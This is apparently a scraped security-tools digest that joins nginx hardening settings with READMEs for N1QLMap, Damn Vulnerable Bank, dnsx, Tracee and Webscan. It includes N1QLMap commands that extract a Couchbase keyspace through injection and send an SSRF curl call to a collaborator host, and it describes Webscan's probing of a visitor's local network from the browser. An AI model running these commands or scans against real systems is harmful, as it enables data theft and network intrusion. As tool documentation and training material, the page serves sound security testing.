Default value : accelerometer=(), ambient-light-sensor=(), autoplay=(), camera=(), display-capture=(), document-domain=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), speaker=(), sync-xhr=(), usb=(), vibrate=(), vr=()
Context : global, multisite
Tells the browser which features can be used on the website.
More info here.

COOKIE_FLAGS
Values : * HttpOnly | MyCookie secure SameSite=Lax | ...
Default value : * HttpOnly SameSite=Lax
Context : global, multisite
Adds some security to the cookies set by the server.
Accepted value can be found here.

COOKIE_AUTO_SECURE_FLAG
Values : yes | no
Default value : yes
Context : global, multisite
When set to yes, the secure will be automatically added to cookies when using HTTPS.

STRICT_TRANSPORT_POLICY
Values : max-age=expireTime [; includeSubDomains] [; preload]
Default value : max-age=31536000
Context : global, multisite
Tells the browser to use exclusively HTTPS instead of HTTP when communicating with the server.
More info here.

CONTENT_SECURITY_POLICY
Values : <directive 1>; <directive 2>; ...
Default value : default-src 'self'; frame-ancestors 'self'; form-action 'self'; block-all-mixed-content; sandbox allow-forms allow-same-origin allow-scripts; reflected-xss block; base-uri 'self'; referrer no-referrer
Context : global, multisite
Policy to be used when loading resources (scripts, forms, frames, ...).
More info here.


Blocking

Antibot

USE_ANTIBOT
Values : no | cookie | javascript | captcha | recaptcha
Default value : no
Context : global, multisite
If set to another allowed value than no, users must complete a "challenge" before accessing the pages on your website :

  • cookie : asks the users to set a cookie
  • javascript : users must execute a javascript code
  • captcha : a text captcha must be resolved by the users
  • recaptcha : use Google reCAPTCHA v3 score to allow/deny users

ANTIBOT_URI
Values : <any valid uri>
Default value : /challenge
Context : global, multisite
A valid and unused URI to redirect users when USE_ANTIBOT is used. Be sure that it doesn't exist on your website.

ANTIBOT_SESSION_SECRET
Values : random | <32 chars of your choice>
Default value : random
Context : global, multisite
A secret used to generate sessions when USE_ANTIBOT is set. Using the special random value will generate a random one. Be sure to use the same value when you are in a multi-server environment (so sessions are valid in all the servers).

ANTIBOT_RECAPTCHA_SCORE
Values : <0.0 to 1.0>
Default value : 0.7
Context : global, multisite
The minimum score required when USE_ANTIBOT is set to recaptcha.

ANTIBOT_RECAPTCHA_SITEKEY
Values : <public key given by Google>
Default value :
Context : global
The sitekey given by Google when USE_ANTIBOT is set to recaptcha.

ANTIBOT_RECAPTCHA_SECRET
Values : <private key given by Google>
Default value :
Context : global
The secret given by Google when USE_ANTIBOT is set to recaptcha.


External blacklists

BLOCK_USER_AGENT
Values : yes | no
Default value : yes Context : global, multisite
If set to yes, block clients with "bad" user agent.
Blacklist can be found here.

BLOCK_TOR_EXIT_NODE
Values : yes | no
Default value : yes
Context : global, multisite
Is set to yes, will block known TOR exit nodes.
Blacklist can be found here.

BLOCK_PROXIES
Values : yes | no
Default value : yes
Context : global, multisite
Is set to yes, will block known proxies.
Blacklist can be found here.

BLOCK_ABUSERS
Values : yes | no
Default value : yes
Context : global, multisite
Is set to yes, will block known abusers.
Blacklist can be found here.


DNSBL

USE_DNSBL
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, DNSBL checks will be performed to the servers specified in the DNSBL_LIST environment variable.

DNSBL_LIST
Values : <list of DNS zones separated with spaces>
Default value : bl.blocklist.de problems.dnsbl.sorbs.net sbl.spamhaus.org xbl.spamhaus.org
Context : global
The list of DNSBL zones to query when USE_DNSBL is set to yes.


CrowdSec

USE_CROWDSEC
Values : yes | no
Default value : no
Context : global, multisite
If set to yes, CrowdSec will be enabled with the nginx collection. API pulls will be done automaticaly.


Custom whitelisting

USE_WHITELIST_IP
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, lets you define custom IP addresses to be whitelisted through the WHITELIST_IP_LIST environment variable.

WHITELIST_IP_LIST
Values : <list of IP addresses separated with spaces>
Default value : 23.21.227.69 40.88.21.235 50.16.241.113 50.16.241.114 50.16.241.117 50.16.247.234 52.204.97.54 52.5.190.19 54.197.234.188 54.208.100.253 54.208.102.37 107.21.1.8
Context : global
The list of IP addresses to whitelist when USE_WHITELIST_IP is set to yes. The default list contains IP addresses of the DuckDuckGo crawler.

USE_WHITELIST_REVERSE
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, lets you define custom reverse DNS suffixes to be whitelisted through the WHITELIST_REVERSE_LIST environment variable.

WHITELIST_REVERSE_LIST
Values : <list of reverse DNS suffixes separated with spaces>
Default value : .googlebot.com .google.com .search.msn.com .crawl.yahoot.net .crawl.baidu.jp .crawl.baidu.com .yandex.com .yandex.ru .yandex.net
Context : global
The list of reverse DNS suffixes to whitelist when USE_WHITELIST_REVERSE is set to yes. The default list contains suffixes of major search engines.


Custom blacklisting

USE_BLACKLIST_IP
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, lets you define custom IP addresses to be blacklisted through the BLACKLIST_IP_LIST environment variable.

BLACKLIST_IP_LIST
Values : <list of IP addresses separated with spaces>
Default value :
Context : global
The list of IP addresses to blacklist when USE_BLACKLIST_IP is set to yes.

USE_BLACKLIST_REVERSE
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, lets you define custom reverse DNS suffixes to be blacklisted through the BLACKLIST_REVERSE_LIST environment variable.

BLACKLIST_REVERSE_LIST
Values : <list of reverse DNS suffixes separated with spaces>
Default value : .shodan.io
Context : global
The list of reverse DNS suffixes to blacklist when USE_BLACKLIST_REVERSE is set to yes.


Requests limiting

USE_LIMIT_REQ
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, the amount of HTTP requests made by a user will be limited during a period of time.
More info rate limiting here.

LIMIT_REQ_RATE
Values : Xr/s | Xr/m
Default value : 20r/s
Context : global, multisite
The rate limit to apply when USE_LIMIT_REQ is set to yes. Default is 10 requests per second.

LIMIT_REQ_BURST
Values : <any valid integer>
Default value : 40
Context : global, multisite
The number of of requests to put in queue before rejecting requests.

LIMIT_REQ_CACHE
Values : Xm | Xk
Default value : 10m
Context : global
The size of the cache to store information about request limiting.


Countries

BLACKLIST_COUNTRY
Values : <country code 1> <country code 2> ...
Default value :
Context : global, multisite
Block some countries from accessing your website. Use 2 letters country code separated with space.

WHITELIST_COUNTRY
Values : <country code 1> <country code 2> ...
Default value :
Context : global, multisite
Only allow specific countries accessing your website. Use 2 letters country code separated with space.


PHP

REMOTE_PHP
Values : <any valid IP/hostname>
Default value :
Context : global, multisite
Set the IP/hostname address of a remote PHP-FPM to execute .php files. See USE_PHP if you want to run a PHP-FPM instance on the same container as bunkerized-nginx.

REMOTE_PHP_PATH
Values : <any valid absolute path>
Default value : /app
Context : global, multisite
The path where the PHP files are located inside the server specified in REMOTE_PHP.


Fail2ban

USE_FAIL2BAN
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, fail2ban will be used to block users getting too much "strange" HTTP codes in a period of time.
Instead of using iptables which is not possible inside a container, fail2ban will dynamically update nginx to ban/unban IP addresses.
If a number (FAIL2BAN_MAXRETRY) of "strange" HTTP codes (FAIL2BAN_STATUS_CODES) is found between a time interval (FAIL2BAN_FINDTIME) then the originating IP address will be ban for a specific period of time (FAIL2BAN_BANTIME).

FAIL2BAN_STATUS_CODES
Values : <HTTP status codes separated with | char>
Default value : 400|401|403|404|405|444
Context : global
List of "strange" error codes that fail2ban will search for.

FAIL2BAN_BANTIME
Values :
Default value : 3600
Context : global
The duration time, in seconds, of a ban.

FAIL2BAN_FINDTIME
Values :
Default : value : 60
Context : global
The time interval, in seconds, to search for "strange" HTTP status codes.

FAIL2BAN_MAXRETRY
Values : <any positive integer>
Default : value : 15
Context : global
The number of "strange" HTTP status codes to find between the time interval.


ClamAV

USE_CLAMAV_UPLOAD
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, ClamAV will scan every file uploads and block the upload if the file is detected.

USE_CLAMAV_SCAN
Values : yes | no
Default value : yes
Context : global
If set to yes, ClamAV will scan all the files inside the container every day.

CLAMAV_SCAN_REMOVE
Values : yes | no
Default value : yes
Context : global
If set to yes, ClamAV will automatically remove the detected files.


Misc

ADDITIONAL_MODULES
Values : <list of packages separated with space>
Default value :
Context : global
You can specify additional modules to install. All alpine packages are valid.

LOGROTATE_MINSIZE
Values : x | xk | xM | xG
Default value : 10M
Context : global
The minimum size of a log file before being rotated (no letter = bytes, k = kilobytes, M = megabytes, G = gigabytes).

LOGROTATE_MAXAGE
Values : <any integer>
Default value : 7
Context : global
The number of days before rotated files are deleted.


Include custom configurations

Custom configurations files (ending with .conf suffix) can be added in some directory inside the container :

  • /http-confs : http context
  • /server-confs : server context

You just need to use a volume like this :

docker run ... -v /path/to/http/confs:/http-confs:ro ... -v /path/to/server/confs:/server-confs:ro ... bunkerity/bunkerized-nginx

When MULTISITE is set to yes, .conf files inside the /server-confs directory are loaded by all the server blocks. You can also set custom configuration for a specific server block by adding files in a subdirectory named as the host defined in the SERVER_NAME environment variable. Here is an example :

docker run ... -v /path/to/server/confs:/server-confs:ro ... -e MULTISITE=yes -e "SERVER_NAME=app1.domain.com app2.domain.com" ... bunkerity/bunkerized-nginx

The /path/to/server/confs directory should have a structure like this :

/path/to/server/confs
├── app1.domain.com
│   └── custom.conf
│   └── ...
└── app2.domain.com
└── custom.conf
└── ...

Cache data

You can store cached data (blacklists, geoip DB, ...) to avoid downloading them again after a container deletion by mounting a volume on the /cache directory :

docker run ... -v /path/to/cache:/cache ... bunkerity/bunkerized-nginx


N1QLMap - The Tool Exfiltrates Data From Couchbase Database By Exploiting N1QL Injection Vulnerabilities

$
0
0


N1QLMap is an N1QL exploitation tool. Currently works with Couchbase database. The tool supports data extraction and performing SSRF attacks via CURL. More information can be found here: https://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database.


Usage

Help
usage: n1qlMap.py [-h] [-r REQUEST] [-k KEYWORD] [--proxy PROXY] [--validatecerts] [-v]
(-d | -ks DATASTORE_URL | -e KEYSPACE_ID | -q QUERY | -c [ENDPOINT [OPTIONS ...]])
host

positional arguments:
host Host used to send an HTTP request e.g. https://vulndomain.net

optional arguments:
-h, --help show this help message and exit
-r REQUEST, --request REQUEST
Path to an HTTP request
-k KEYWORD, --keyword KEYWORD
Keyword that exists in HTTP response when query is successful
--proxy PROXY Proxy server address
--validatecerts Set the flag to enforce certificate validation. Certificates are not validated by default!
-v, --verbose_debug Set the verbosity level to debug
-d, -- datastores Lists available datastores
-ks DATASTORE_URL, --keyspaces DATASTORE_URL
Lists available keyspaces for specific datastore URL
-e KEYSPACE_ID, --extract KEYSPACE_ID
Extracts data from a specific keyspace
-q QUERY, --query QUERY
Run arbitrary N1QL query
-c [ENDPOINT [OPTIONS ...]], --curl [ENDPOINT [OPTIONS ...]]
Runs CURL N1QL function inside the query, can be used to SSRF

Usage
  1. Put an HTTP request to request.txt file. Mark an injection point using *i*. See example_request_1.txt file for a reference.
  2. Use one the following commands.

Extracts datastores:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --datastores

Extracts keyspaces from the specific datastore ID:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --keyspaces "http://127.0.0.1:8091"

Extracts all documents from the given keyspace:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --extract travel-sample

Run arbitrary query:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --query 'SELECT * FROM `travel-sample` AS T ORDER by META(T).id LIMIT 1'

Perform CURL request / SSRF:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --curl *************j3mrt7xy3pre.burpcollaborator.net "{'request':'POST','data':'data','header':['User-Agent: Agent Smith']}"

Demo

To play with the vulnerability you can spin Docker machines with Couchbase and NodeJS web application. If you already met the Requirements, just run the:

cd n1ql-demo
./quick_setup.sh

Now, you can run command described in Usage section against Dockerised web application.


Requirements

N1QLMap.py script doesn't need any specific requirements apart of Python 3.

The following requirements are only for Demo provided in n1ql-demo directory.

  • Docker
  • Docker Compose

To install Docker and Docker Compose on Kali:

# Docker Installation
curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -
echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' > /etc/apt/sources.list.d/docker.list
apt-get update

apt-get remove docker docker-engine docker.io
apt-get install docker-ce

# Start Docker Service
systemctl start docker

# Docker Compose Installation
sudo curl -L "https://github.com/docker/compose/releases/download/1.24.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose

Let's test Docker:

docker run hello-world


Damn-Vulnerable-Bank - Vulnerable Banking Application For Android

$
0
0


Damn Vulnerable Bank Android Application aims to provide an interface for everyone to get a detailed understanding with internals and security aspects of android application.



How to Use Application
  • Clone the repository and run the Backend Server as per instructions in the link.
  • We have released the Apk so after downloading install it via adb or manual.
  • After Installation open the App and add Backend IP in Homescreen
  • Test running status by pressing health check
  • Now create an account by signup option and then login with your credentials
  • Now you can see the dashboard and perform banking operations
  • Login as admin to approve beneficiary
  • The database is pre-populated with a few users for quick exploration.
UsernamePasswordAccount NumberBeneficiariesAdmin privileges
user1password1111111222222, 333333, 444444No
user2password2222222NoneNo
user3password3333333NoneNo
user4password4444444NoneNo
adminadmin999999NoneYes

Features
  • Sign up
  • Login
  • My profile interface
  • Change password
  • Settings interface to update backend URL
  • Add fingerprint check before transferring/viewing funds
  • Add pin check before transferring/viewing funds
  • View balance
  • Transfer money
    • Via manual entry
    • Via QR scan
  • Add beneficiary
  • Delete beneficiary
  • View beneficiary
  • View transactions history
  • Download transactions history

Building the Apk with Obfuscation
  • Go to Build options and select Generate Signed Bundled/Apk
  • Then select Apk as option and click next
  • Now we need a keystore to sign an apk
  • Create a new keystore and remember its password
  • After creating select that keystore and enter password
  • Now select Build variant as Release and signature version as V2
  • Now we can build the apk successfully

List of vulnerabilities in the application

To keep things crisp and interesting, we hidden this section. Do not toggle this button if you want a fun and challenging experience. Try to explore the application, find all the possible vulnerabilities and then cross check your findings with this list.

Spoiler Alert
  • Root and emulator detection
  • Anti-debugging checks (prevents hooking with frida, jdb, etc)
  • SSL pinning - pin the certificate/public key
  • Obfuscate the entire code
  • Encrypt all requests and responses
  • Hardcoded sensitive information
  • Logcat leakage
  • Insecure storage (saved credit card numbers maybe)
  • Exported activities
  • JWT token
  • Webview integration
  • Deep links
  • IDOR

Backend to-do
  • Add profile and change-password routes
  • Create different secrets for admin and other users
  • Add dynamic generation of secrets to verify JWT tokens
  • Introduce bug in jwt verification
  • Find a way to store database and mount it while using docker
  • Dockerize environment

Authors

Thanks to these amazing people

Rewanth Cool (Rest API)GithubLinkedIn
Hrushikesh Kakade (Android App)GithubLinkedIn
Akshansh Jaiswal (Android App)GithubLinkedIn


DNSx - A Fast And Multi-Purpose DNS Toolkit Allow To Run Multiple DNS Queries Of Your Choice With A List Of User-Supplied Resolvers

$
0
0


dnsx is a fast and multi-purpose DNS toolkit allow to run multiple probers using retryabledns library, that allows you to perform multiple DNS queries of your choice with a list of user supplied resolvers.

dnsx is successor of dnsprobe that includes new features, multiple bugs fixes, and tailored for better user experience, few notable flags are resp and resp-only that allows to control and print the exact information you are looking for.

We also ported DNS wildcard filtering feature to dnsx from shuffledns as a standalone support.


Features
 
  • Simple and Handy utility to query DNS records.
  • Supports A, AAAA, CNAME, PTR, NS, MX, TXT, SOA
  • Handles wildcard subdomains in automated way.
  • Optimized for ease of use.
  • Stdin and stdout support to work with other tools.

Usage
dnsx -h

This will display help for the tool. Here are all the switches it supports.

FlagDescriptionExample
aQuery A recorddnsx -a
aaaaQuery AAAA recorddnsx -aaaa
cnameQuery CNAME recorddnsx -cname
nsQuery NS recorddnsx -ns
ptrQuery PTR recorddnsx -ptr
txtQuery TXT recorddnsx -txt
mxQuery MX recorddnsx -mx
soaQuery SOA recorddnsx -soa
rawOperates like digdnsx -raw
lFile input list of subdomains/hostdnsx -l list.txt
jsonJSON outputdnsx -json
rFile or comma separated resolversdnsx -r 1.1.1.1
rlLimit of DNS request/seconddnsx -rl 100
respDisplay response datadnsx -cname -resp
resp-onlyDisplay only response datadnsx -cname resp-only
retryNumber of DNS retriesdnsx -retry 1
silentShow only results in the outputdnsx -silent
oFile to write output to (optional)dnsx -o output.txt
tConcurrent threads to makednsx -t 250
verboseVerbose outputdnsx -verbose
versionShow version of dnsxdnsx -version
wdWildcard domain name for filteringdnsx -wd example.com
wtWildcard Filter Thresholddnsx -wt 5

Installation Instructions

From Source

The installation is easy. You can download the pre-built binaries for your platform from the Releases page. Extract them using tar, move it to your $PATHand you're ready to go.

Download latest binary from https://github.com/projectdiscovery/dnsx/releases

▶ tar -xvf dnsx-linux-amd64.tar
▶ mv dnsx-linux-amd64 /usr/local/bin/dnsx
▶ dnsx -h

From Source

dnsx requires go1.14+ to install successfully. Run the following command to get the repo -

▶ GO111MODULE=on go get -u -v github.com/projectdiscovery/dnsx/cmd/dnsx

From Github
▶ git clone https://github.com/projectdiscovery/dnsx.git; cd dnsx/cmd/dnsx; go build; mv dnsx /usr/local/bin/; dnsx -version

Running dnsx

dnsx can be used to filter dead records from the list of passive subdomains obtained from various sources, for example:-

subfinder -silent -d hackerone.com | dnsx

_ __ __
__| | _ __ ___ \ \/ /
/ _' || '_ \ / __| \ /
| (_| || | | |\__ \ / \
\__,_||_| |_||___//_/\_\ v1.0

projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.

a.ns.hackerone.com
www.hackerone.com
api.hackerone.com
docs.hackerone.com
mta-sts.managed.hackerone.com
mta-sts.hackerone.com
resources.hackerone.com
b.ns.hackerone.com
mta-sts.forwarding.hackerone.com
events.hackerone.com
support.hackerone.com

dnsx can be used to extract A records for the given list of subdomains, for example:-

▶ subfinder -silent -d hackerone.com | dnsx -silent -A -resp

a.ns.hackerone.com [162.159.0.31]
b.ns.hackerone.com [162.159.1.31]
mta-sts.hackerone.com [185.199.108.153]
events.hackerone.com [208.100.11.134]
mta-sts.managed.hackerone.com [185.199.108.153]
resources.hackerone.com [52.60.160.16]
resources.hackerone.com [52.60.165.183]
www.hackerone.com [104.16.100.52]
support.hackerone.com [104.16.53.111]

dnsx can be used to extract CNAME records for the given list of subdomains, for example:-

▶ subfinder -silent -d hackerone.com | dnsx -silent -cname -resp

support.hackerone.com [hackerone.zendesk.com]
resources.hackerone.com [read.uberflip.com]
mta-sts.hackerone.com [hacker0x01.github.io]
mta-sts.forwarding.hackerone.com [hacker0x01.github.io]
events.hackerone.com [whitelabel.bigmarker.com]

dnsx can be used to extract subdomains from given network range using PTR query, for example:-

mapcidr -cidr 173.0.84.0/24 -silent | dnsx -silent -resp-only -ptr

cors.api.paypal.com
trinityadminauth.paypal.com
cld-edge-origin-api.paypal.com
appmanagement.paypal.com
svcs.paypal.com
trinitypie-serv.paypal.com
ppn.paypal.com
pointofsale-new.paypal.com
pointofsale.paypal.com
slc-a-origin-pointofsale.paypal.com
fpdbs.paypal.com

Wildcard filtering

A special feature of dnsx is its ability to handle multi-level DNS based wildcards and do it so with very less number of DNS requests. Sometimes all the subdomains will resolve which will lead to lots of garbage in the results. The way dnsx handles this is it will keep track of how many subdomains point to an IP and if the count of the Subdomains increase beyond a certain small threshold, it will check for wildcard on all the levels of the hosts for that IP iteratively.

dnsx -l airbnb-subs.txt -wd airbnb.com -o output.txt

Notes
  • As default, dnsx checks for A record.
  • As default dnsx uses Google, Cloudflare, Quad9 resolver.
  • Domain name input is mandatory for wildcard elimination.
  • DNS record flag can not be used when using wildcard filtering.

dnsx is made with

by the projectdiscovery team.

Tracee - Container And System Event Tracing Using eBPF

$
0
0

Tracee is a lightweight and easy to use container and system tracing tool. It allows you to observe system calls and other system events in real-time. A unique feature of Tracee is that it will only trace newly created processes and containers (that were started after Tracee has started), in order to help the user focus on relevant events instead of every single thing that happens on the system (which can be overwhelming). Adding new events to Tracee (especially system calls) is straightforward, and will usually require no more than adding few lines of code.


Other than tracing, Tracee is also capable of capturing files written to disk or memory ("fileless"), and extracting binaries that are dynamically loaded to an application's memory (e.g. when an application uses a packer). With these features, it is possible to quickly gain insights about the running processes that previously required the use of dynamic analysis tools and special knowledge.

Check out this quick demo of tracee


Getting started

Prerequisites
  • To run, Tracee requires Linux kernel version >= 4.14

Not required if using the Docker image:

  • C standard library (tested with glibc)
  • libelf and zlib libraries
  • clang >= 9

Not required if pre-compiling the eBPF code (see Installation options):

  • clang >= 9
  • Kernel headers available under /usr/src, must be provided by user and match the running kernel version, not needed if building the eBPF program in advance

Quickstart with Docker
docker run --name tracee --rm --privileged --pid=host -v /lib/modules/:/lib/modules/:ro -v /usr/src:/usr/src:ro -v /tmp/tracee:/tmp/tracee aquasec/tracee

Note: You may need to change the volume mounts for the kernel headers based on your setup.

This will run Tracee with no arguments, which defaults to collecting all events from all newly created processes and printing them in a table to standard output.


Setup options

Tracee is made of an executable that drives the eBPF program (tracee), and the eBPF program itself (tracee.bpf.$kernelversion.$traceeversion.o). When the tracee executable is started, it will look for the eBPF program next to the executable, or in /tmp/tracee, or in a directory specified in TRACEE_BPF_FILE environment variable. If the eBPF program is not found, the executable will attempt to build it automatically before it starts (you can control this using the --build-policy flag).

The easiest way to get started is to let the tracee executable build the eBPF program for you automatically. You can obtain the executable in any of the following ways:

  1. Download from the GitHub Releases (tracee.tar.gz).
  2. Use the docker image from Docker Hub: aquasec/tracee (includes all the required dependencies).
  3. Build the executable from source using make build. For that you will need additional development tooling.
  4. Build the executable from source in a Docker container which includes all development tooling, using make build DOCKER=1.

Alternatively, you can pre-compile the eBPF program, and provide it to the tracee executable. There are some benefits to this approach since you will not need clang and kernel headers at runtime anymore, as well as reduced risk of invoking an external program at runtime. You can build the eBPF program in the following ways:

  1. make bpf
  2. make bpf DOCKER=1 to build in a Docker container which includes all development tooling.
  3. There is also a handy make all (and the make all DOCKER=1 variant) which builds both the executable and the eBPF program.

Once you have the eBPF program artifact, you can provide it to Tracee in any of the locations mentioned above. In this case, the full Docker image can be replaced by the lighter-weight aquasec/tracee:slim image. This image cannot build the eBPF program on its own, and is meant to be used when you have already compiled the eBPF program beforehand.


Running in container

Tracee uses a filesystem directory, by default /tmp/tracee to capture runtime artifacts, internal components, and other miscellaneous. When running in a container, it's useful to mount this directory in, so that the artifacts are accessible after the container exits. For example, you can add this to the docker run command -v /tmp/tracee:/tmp/tracee.

If running in a container, regardless if it's the full or slim image, it's advisable to reuse the eBPF program across runs by mounting it from the host to the container. This way if the container builds the eBPF program it will be persisted on the host, and if the eBPF program already exists on the host, the container will automatically discover it. If you've already mounted the /tmp/tracee directory from the host, you're good to go, since Tracee by default will use this location for the eBPF program. You can also mount the eBPF program file individually if it's stored elsewhere (e.g in a shared volume), for example: -v /path/to/tracee.bpf.1_2_3.4_5_6.o:/some/path/tracee.bpf.1_2_3.4_5_6.o -e TRACEE_BPF_FILE=/some/path.

When using the --capture exec option, Tracee needs access to the host PID namespace. For Docker, add --pid=host to the run command.

If you are building the eBPF program in a container, you'll need to make the kernel headers available in the container. The quickstart example has wide mounts that works in a variety of cases, for demonstration purposes. If you want, you can narrow those mounts down to a directory that contains the headers on your setup, for example: -v /path/to/headers:/myheaders -e KERN_SRC=/myheaders. As mentioned before, a better practice for production is to pre-compile the eBPF program, in which case the kernel headers are not needed at runtime.


Permissions

If Tracee is not actually tracing, it doesn't need privileges. For example, just building the eBPF program, or listing the available options, can be done with a regular user.
For actually tracing, Tracee needs to run with sufficient capabilities:

  • CAP_SYS_RESOURCE (to manage eBPF maps limits)
  • CAP_BPF+CAP_TRACING which are available on recent kernels (>=5.8), or SYS_ADMIN on older kernels (to load and attach the eBPF programs).

Alternatively, running as root or with the --privileged flag of Docker, is an easy way to start.


Using Tracee

Understanding the output

Here's a sample output of running Tracee with no additional arguments (which defaults to tracing all events):

TIME(s)        UID    COMM             PID     TID     RET             EVENT                ARGS
176751.746515 1000 zsh 14726 14726 0 execve pathname: /usr/bin/ls, argv: [ls]
176751.746772 1000 zsh 14726 14726 0 security_bprm_check pathname: /usr/bin/ls, dev: 8388610, inode: 777
176751.747044 1000 ls 14726 14726 -2 access pathname: /etc/ld.so.preload, mode: R_OK
176751.747077 1000 ls 14726 14726 0 security_file_open pathname: /etc/ld.so.cache, flags: O_RDONLY|O_LARGEFILE, dev: 8388610, inode: 533737
...

Each line is a single event collected by Tracee, with the following information:

  1. TIME - shows the event time relative to system boot time in seconds
  2. UID - real user id (in host user namespace) of the calling process
  3. COMM - name of the calling process
  4. PID - pid of the calling process
  5. TID - tid of the calling thread
  6. RET - value returned by the function
  7. EVENT - identifies the event (e.g. syscall name)
  8. ARGS - list of arguments given to the function

When using table-verbose output, the following information is added:

  1. UTS_NAME - uts namespace name. As there is no container id object in the kernel, and docker/k8s will usually set this to the container id, we use this field to distinguish between containers.
  2. MNT_NS - mount namespace inode number.
  3. PID_NS - pid namespace inode number. In order to know if there are different containers in the same pid namespace (e.g. in a k8s pod), it is possible to check this value
  4. PPID - parent pid of the calling process

Configuration flags
  • Use --help to see a full description of all options. Here are a few commonly useful flags:
  • --trace Sets the trace mode. For more information see Trace Mode Configuration below
  • --event allows you to specify a specific event to trace. You can use this flag multiple times, for example --event execve --event openat.
  • --list lists the events available for tracing, which you can provide to the --event flag.
  • --output lets you control the output format, for example --output json will output as JSON lines instead of table.
  • --capture capture artifacts that were written, executed or found suspicious, and save them to the output directory. Possible values are: 'write'/'exec'/'mem'/'all'

Trace Mode Configuration

--trace and -t set whether to trace events based upon system-wide processes, or Containers. It also used to set whether to trace only new processes/containers (default), existing processes/containers, or specific processes. Tracing specific containers is currently not possible. The possible options are:

OptionFlag(s):
Trace new processes (default)no --trace flag, --trace p, --trace process or --trace process:new
Trace existing and new processes--trace process:all
Trace specific PIDs--trace process:<pid>,<pid2>,... or --trace p:<pid>,<pid2>,...
Trace new containers--trace c, --trace container or --trace container:new
Trace existing and new containers--trace container:all

You can also use -t e.g. -t p:all


Secure tracing

When Tracee reads information from user programs it is subject to a race condition where the user program might be able to change the arguments after Tracee has read them. For example, a program invoked execve("/bin/ls", NULL, 0), Tracee picked that up and will report that, then the program changed the first argument from /bin/ls to /bin/bash, and this is what the kernel will execute. To mitigate this, Tracee also provide "LSM" (Linux Security Module) based events, for example, the bprm_check event which can be reported by tracee and cross-referenced with the reported regular syscall event.



Webscan - Browser-based Network Scanner And local-IP Detection

$
0
0


webscan is a browser-based network IP scanner and local IP detector. It detects IPs bound to the user/victim by listening on an RTP data channel via WebRTC and looping back to the port across any live IPs, as well as discovering all live IP addresses on valid subnets by monitoring for immediate timeouts (TCP RST packets returned) from fetch() calls or hidden img tags pointed to valid subnets/IPs. Works on mobile and desktop across all major browsers and OS's. Beta version is extensible to allow the addition of multiple techniqu es.


webscan takes advantage of the fact that non-responsive img tag sockets can be closed to prevent browser & network-based rate limiting by altering the src attribute to a non-socket URI (removing from DOM ironically does not close the socket), or by using fetch()'s signal support of the AbortController() interface.

try webscan live here
beta version here

by @SamyKamkar
released 2020/11/07
more fun projects at samy.pl

webscan works like so

  1. webscan first iterates through a list of common gateway IP addresses
  2. for each IP, use fetch() to make fake HTTP connection to http://common.gateway.ip:1337
  3. if a TCP RST returns, the fetch() promise will be rejected or img tag onerror will trigger before a timeout, indicating a live IP
  4. to prevent browser or network rate limiting, non-responsive fetch() sockets are closed via AbortController() signal while img-tags have the src redirected to non-socket URI, closing the socket
  5. when live gateway detected, step 1-3 reran for every IP on the subnet (e.g. 192.168.0.[1-255])
  6. a WebRTC data channel is opened on the browser, opening a random port on the victim machine
  7. for any IPs that are found alive on the subnet, a WebRTC data channel connection is made to that host
  8. if the WebRTC data channel is successful, we know we just established a connection to our own local IP

implementation
// wait for scan to finish
let scanResults = await webScanAll()

// or get callbacks when ips are found with a promise
let ipsToScan = undefined // scans all pre-defined networks if null
let scanPromise = webScanAll(
ipsToScan, // array. if undefined, scan major subnet gateways, then scan live subnets. supports wildcards
{
rtc: true, // use webrtc to detect local ips
logger: l => console.log(l), // logger callback
localCallback: function(ip) { console.log(`local ip callback: ${ip}`) },
networkCallback: function(ip) { console.log(`network ip callback: ${ip}`) },
}
)

returns

scanResults = {
"local": ["192.168.0.109"], // local ip address
"network": { // other hosts on the network and how fast they respond
"192.168.0.1": 97,
"192.168.0.2": 82,
"192.168.0.100": 46,
"192.168.0.109": 0,
"192.168.0.117": 74,
"192.168.0.113": 17,
"192.168.0.112": 21,
"192.168.0.114": 25,
"192.168.0.116": 25,
"192.168.0.115": 25,
"192.168.0.105": 57,
"192.168.0.107": 63,
"192.168.0.103": 64,
"192.168.0.108": 31
}
}

Todo

  • use iframe to perform scans in blocks
    • when the frame is torn down, i assume this helps guarantee the connections are torn down
    • how do multiple iframes scanning multiple blocks work? perhaps this allows us to bypass browser connection rate limiting
  • support both fetch() and img as scanner cores (completed in beta)
    • Safari
      • note: img tag works really well in some browsers like Safari
      • caveat: changing the .src doesn't seem to abort the connection
      • potential solution: see iframe note above
    • Chrome
      • caveat: chrome will not abort the connection if you remove the img from dom
      • solution: chrome will abort the connection of an img if you adjust the .src, this is great!
      • caveat: changing the img.src to '#' makes another request to the same parent page
      • caveat: changing the img.src to 'about:' produces a warning in console, is there something else to use that won't make a request?
  • use img timing as a local ip detection mechanism

Tested on

  • Chrome 87.0.4280.47 (macOS)
  • Edge 86.0.622.63 (Windows)
  • Firefox 82.0.2 (macOS)
  • Firefox 82.0.2 (Windows 10)
  • Safari 13.1.2 (macOS)
  • mobile Safari (iOS)
  • mobile Chrome (iOS)



Talon - A Password Guessing Tool That Targets The Kerberos And LDAP Services Within The Windows Active Directory Environment

$
0
0


